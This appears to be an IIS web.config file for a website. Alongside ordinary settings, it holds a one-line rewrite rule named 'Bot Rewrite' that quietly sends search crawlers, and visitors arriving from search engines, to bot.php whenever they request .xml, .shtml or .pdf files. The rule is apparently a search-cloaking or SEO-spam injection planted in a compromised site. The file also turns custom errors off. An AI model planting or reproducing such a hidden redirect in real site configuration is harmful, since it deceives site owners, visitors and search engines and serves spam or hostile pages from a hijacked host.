<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
<rewrite><rules><rule name="Bot Rewrite" patternSyntax="ECMAScript" stopProcessing="true"><match url="\.(xml|shtml|pdf)$" ignoreCase="true" negate="false" /><conditions logicalGrouping="MatchAny" trackAllCaptures="false"><add input="{HTTP_REFERER}" pattern="google|yahoo|bing|aol|ask" /><add input="{HTTP_USER_AGENT}" pattern="Googlebot|Yahoo|MSNBot|bingbot" /></conditions><action type="Rewrite" url="bot.php" /></rule></rules></rewrite>
        <directoryBrowse enabled="false" />
        <defaultDocument>
            <files>
                <clear />
                <add value="index.php" />
                <add value="Default.htm" />
                <add value="Default.asp" />
                <add value="index.htm" />
                <add value="index.html" />
                <add value="iisstart.htm" />
                <add value="default.aspx" />
            </files>
        </defaultDocument>
        <httpProtocol>
            <customHeaders>
                <clear />
                <add name="X-Powered-By" value="ASP.NET" />
            </customHeaders>
        </httpProtocol>
    </system.webServer>
    <system.web>
        <customErrors mode="Off" />
    </system.web>
</configuration>
